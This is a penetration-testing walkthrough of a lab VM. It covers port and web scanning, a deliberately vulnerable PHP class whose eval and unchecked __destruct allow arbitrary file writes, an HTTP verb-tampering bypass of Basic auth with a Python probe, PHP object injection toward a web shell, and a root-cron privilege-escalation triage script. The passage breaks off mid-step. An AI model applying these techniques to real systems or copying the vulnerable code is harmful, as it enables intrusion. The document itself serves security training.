As usual, start with arp-scan to find the target's IP address on the local segment (10.1.1.143 in this case).

```
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1    00:50:56:c0:00:08   VMware, Inc.
10.1.1.2    00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.143  00:0c:29:64:39:5e   VMware, Inc.
10.1.1.254  00:50:56:f5:74:35   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.657 seconds (96.35 hosts/sec). 4 responded
```

10.1.1.143 is our target.
Next, run masscan to find the open ports on the target. masscan is much faster than nmap for a full 65535-port sweep, so I use it for the sweep and then let nmap do a deeper service scan on just the ports it finds.

```
root@kali:~# masscan -p1-65535 10.1.1.143/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-11-21 00:47:26 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 40117/tcp on 10.1.1.143
Discovered open port 111/tcp on 10.1.1.143
Discovered open port 80/tcp on 10.1.1.143
Discovered open port 22/tcp on 10.1.1.143
```

masscan reports four open ports (22, 80, 111 and 40117), so I run nmap for a deeper service scan. Note that the high port differs between the two runs (40117 in masscan, 44161 in the nmap output below): it belongs to rpc.statd, which registers with rpcbind on a dynamically assigned port, so it can change across reboots. Ask rpcbind on port 111 for the current value (`rpcinfo -p 10.1.1.143`) rather than hardcoding it.
```
# Nmap 6.49BETA5 scan initiated Tue Nov 17 05:50:42 2015 as: nmap -sV -v -O -A -T4 -p80,22,111,44161 -oN 10.1.1.143_nmap.txt 10.1.1.143
Nmap scan report for 10.1.1.143
Host is up (0.00035s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
|   2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_  256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp    open  http    Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_  Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp  rpcbind
|   100000  2,3,4      111/udp  rpcbind
|   100024  1        37301/udp  status
|_  100024  1        44161/tcp  status
44161/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:64:39:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.001 days (since Tue Nov 17 05:49:56 2015)
Network Distance: 1 hop
... truncated ...
```
Since port 80 is open (the target runs a web service), run Nikto for a web vulnerability scan:

```
root@kali:~/the_pipe# nikto -host 10.1.1.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.143
+ Target Hostname:    10.1.1.143
+ Target Port:        80
+ Start Time:         2015-11-20 19:53:42 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ / - Requires Authentication for realm 'index.php'
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ / - Requires Authentication for realm 'index.php'
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
... truncated ...
+ / - Requires Authentication for realm 'index.php'
... truncated ...
+ OSVDB-3268: /images/: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ / - Requires Authentication for realm 'index.php'
+ 7667 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2015-11-20 19:54:03 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
Apart from the directory listing under /images/ and the internal IP leaked in the Location header, Nikto turns up nothing useful, so I run DirBuster to brute-force hidden directories and files. It finds two source files in the 'scriptz' folder:

```
/scriptz/log.php.BAK
/scriptz/php.js
```
Looking at the first file, log.php.BAK: this is obviously a backup of log.php, so if I can find and run log.php I should be able to upload a shell to the target server:

```php
<?php
class Log
{
    public $filename = '';
    public $data = '';

    public function __construct()
    {
        $this->filename = '';
        $this->data = '';
    }

    public function PrintLog()
    {
        $pre = "[LOG]";
        $now = date('Y-m-d H:i:s');
        $str = '$pre - $now - $this->data';
        eval("\$str = \"$str\";");
        echo $str;
    }

    public function __destruct()
    {
        file_put_contents($this->filename, $this->data, FILE_APPEND); // <== Here we can write any code into any file
    }
}
?>
```

The interesting part is __destruct(): it runs automatically when a Log object is destroyed, for example at the end of the request that created it, and it appends $data to $filename with no checks on either. Anyone who controls the two public properties of a Log object therefore gets an arbitrary file append without having to call a single method.
Both the nmap and the Nikto output show that index.php sits under the web root and is protected by Basic authentication. Before guessing credentials, check whether that protection is applied to every HTTP method:
```
root@kali:~/the_pipe# nmap -p 80 --script http-method-tamper --script-args 'http-method-tamper.paths={/index.php}' 10.1.1.143

Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-20 21:57 EST
Nmap scan report for 10.1.1.143
Host is up (0.00024s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|       common HTTP methods and in misconfigured .htaccess files.
|
|     Extra information:
|
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /index.php [POST]
|
|     References:
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://capec.mitre.org/data/definitions/274.html
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_      http://www.mkit.com.ar/labs/htexploit/

MAC Address: 00:0C:29:64:39:5E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds
```
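The bypass that http-method-tamper reports works because an Apache configuration or .htaccess that puts its Require directive inside a `<Limit GET>` block only protects the listed verbs (Apache also covers HEAD when GET is limited); any other verb reaches index.php without credentials. Below is an added example, not code from the original write-up or from the target: a small local stand-in server that mimics that misconfiguration on 127.0.0.1, plus a probe that sends each verb unauthenticated and reports which ones return 200 while GET is denied. The server, its port and its response body are constructed for the demo.

```python
"""Emulate an Apache '<Limit GET>' misconfiguration and probe it for
HTTP verb tampering, the way nmap's http-method-tamper script does.
Added example; the local server is a stand-in for the real target."""
import http.server
import threading
import urllib.error
import urllib.request

# Verbs an Apache "<Limit GET>" block restricts: GET, and HEAD implicitly.
LIMITED_METHODS = {"GET", "HEAD"}
PROTECTED_BODY = b"<html>protected index.php</html>"  # constructed


class LimitGetHandler(http.server.BaseHTTPRequestHandler):
    """Behaves like index.php behind 'Require valid-user' inside <Limit GET>."""

    def _handle(self):
        if self.command in LIMITED_METHODS and self.headers.get("Authorization") is None:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="index.php"')
            self.end_headers()
            return
        # Every other verb falls outside the <Limit> block: no auth check at all.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(PROTECTED_BODY)

    do_GET = do_HEAD = do_POST = do_PUT = do_OPTIONS = _handle

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the stand-in server to a free loopback port and serve in the background."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), LimitGetHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def probe_methods(base_url, path="/index.php",
                  methods=("GET", "HEAD", "POST", "PUT", "OPTIONS")):
    """Send one unauthenticated request per verb; return {verb: status code}."""
    results = {}
    for m in methods:
        body = b"" if m in ("POST", "PUT") else None
        req = urllib.request.Request(base_url + path, data=body, method=m)
        try:
            with urllib.request.urlopen(req, timeout=3) as resp:
                results[m] = resp.status
        except urllib.error.HTTPError as e:
            results[m] = e.code
    return results


def bypass_verbs(statuses):
    """Verbs that got 200 although GET was refused with 401: the tampering bypass."""
    if statuses.get("GET") != 401:
        return []
    return sorted(m for m, s in statuses.items() if s == 200)


if __name__ == "__main__":
    srv = start_server()
    base = "http://127.0.0.1:%d" % srv.server_address[1]
    statuses = probe_methods(base)
    print(statuses)
    print("bypass via:", bypass_verbs(statuses))
    srv.shutdown()
```

Against a real host you would call probe_methods with its base URL instead of the local stand-in. The fix on the Apache side is to drop the `<Limit>` wrapper so the Require directive applies to every method, or to use `<LimitExcept>` only for verbs that are deliberately left open; once the check covers all verbs, changing the method gains nothing.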
The script reports /index.php as reachable with POST, so I start Burp, change the request method to POST to bypass the Basic authentication, and get the protected page:
```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
    var object = serialize({id:1, firstname:'Rene', surname:'Margitte', artwork:'The Treachery of Images'});
    object = object.substr(object.indexOf("{"), object.length);
    object = "O:4:\"Info\":4:" + object;
    document.forms[0].param.value = object;
    document.getElementById('info_form').submit();
}
</script>
<title>The Treachery of Images</title>
</head>
<h1><i>The Treachery of Images</i></h1>
<hr/>
From Wikipedia, the free encyclopedia<br/><br/>
The Treachery of Images (French: La trahison des images, 1928–29, sometimes translated as The Treason of Images) is a painting by the Belgian surrealist painter René Magritte, painted when Magritte was 30 years old. The picture shows a pipe. Below it, Magritte painted, "Ceci n'est pas une pipe." [sə.si ne paz‿yn pip], French for "This is not a pipe."
<p>"The famous pipe. How people reproached me for it! And yet, could you stuff my pipe? No, it's just a representation, is it not? So if I had written on my picture 'This is a pipe', I'd have been lying!"</p>
His statement is taken to mean that the painting itself is not a pipe. The painting is merely an image of a pipe. Hence, the description, "this is not a pipe." The theme of pipes with the text "Ceci n'est pas une pipe" is extended in his 1966 painting, Les Deux Mystères. It is currently on display at the Los Angeles County Museum of Art. The painting is sometimes given as an example of metamessage conveyed by paralanguage. Compare with Korzybski's "The word is not the thing" and "The map is not the territory".<br/><br/>
<center>
<div style="width:500px;overflow:hidden;"><img src="images/pipe.jpg" width="400px" height="auto" border="1"></div>
<form action="index.php" id="info_form" method="POST">
<input type="hidden" name="param" value=""/>
<a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form>
</center>
</html>
```
The page loads scriptz/php.js, and the "Show Artist Info." link calls submit_form(), which fills the hidden param field and POSTs the form. Capturing the request in Burp when I click the link, I find the following data in param (after URL decoding):

```
O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The Treachery of Images";}
```
After a closer look at the source code of php.js, log.php.BAK and index.php, I can construct a payload that writes a web shell onto the server.
Once on the box, we notice that the system takes backups automatically, so I check the cron entries in /etc/crontab:

```
www-data@pipe:/home/rene$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *       root    /root/create_backup.sh
*/5 * * * *     root    /usr/bin/compress.sh
```
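The two custom entries at the bottom run as root every minute (/root/create_backup.sh) and every five minutes (/usr/bin/compress.sh), so anything an unprivileged user can change in those scripts, in what they execute, or in their parent directories runs as root within minutes. An added example, not from the original write-up: a small triage script that parses a system crontab (the five-field schedule, user and command form shown above) and reports, for every root job, whether each referenced absolute path exists and whether the current user can read it, write it, or write its parent directory. It runs against a constructed copy of the entries above inside a temporary sandbox in which compress.sh is present and read-only and create_backup.sh is absent; the sandbox stands in for the real filesystem.

```python
"""Triage root cron jobs for paths the current user can read or tamper with.
Added example; SAMPLE_CRONTAB is a constructed copy of the entries above and
build_sandbox() fakes the relevant bits of the filesystem in a temp dir."""
import os
import re
import tempfile

SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh
"""

# System crontab line: five schedule fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")
ASSIGNMENT = re.compile(r"^\s*[A-Za-z_]\w*=")  # SHELL=..., PATH=...


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each real job line."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or ASSIGNMENT.match(line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)


def script_paths(command):
    """Absolute paths mentioned in a cron command (ignoring a bare '/')."""
    return [tok for tok in command.split() if tok.startswith("/") and len(tok) > 1]


def triage(text, root="/"):
    """For root jobs, record existence and read/write access of every referenced
    path and write access to its parent directory (a writable parent lets you
    replace the script). `root` is prefixed so the check can run in a sandbox."""
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in script_paths(command):
            real = os.path.join(root, path.lstrip("/"))
            findings.append({
                "schedule": schedule,
                "path": path,
                "exists": os.path.exists(real),
                "readable": os.access(real, os.R_OK),
                "writable": os.access(real, os.W_OK),
                "parent_writable": os.access(os.path.dirname(real), os.W_OK),
            })
    return findings


def build_sandbox():
    """Constructed filesystem: compress.sh present and read-only,
    /root and create_backup.sh absent (unreadable from www-data's point of view)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "usr/bin"))
    script = os.path.join(root, "usr/bin/compress.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(script, 0o555)
    return root


if __name__ == "__main__":
    sandbox = build_sandbox()
    for f in triage(SAMPLE_CRONTAB, root=sandbox):
        print("%-12s %-28s exists=%s readable=%s writable=%s parent_writable=%s" % (
            f["schedule"], f["path"], f["exists"], f["readable"],
            f["writable"], f["parent_writable"]))
```

On the real host you would call triage(open("/etc/crontab").read()) and also feed it the files under /etc/cron.d. The writable and parent_writable columns are what matter for privilege escalation; readable tells you which scripts you can at least audit for further weak spots, which is the next step the write-up takes.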
I try to read both scripts, but only /usr/bin/compress.sh is readable: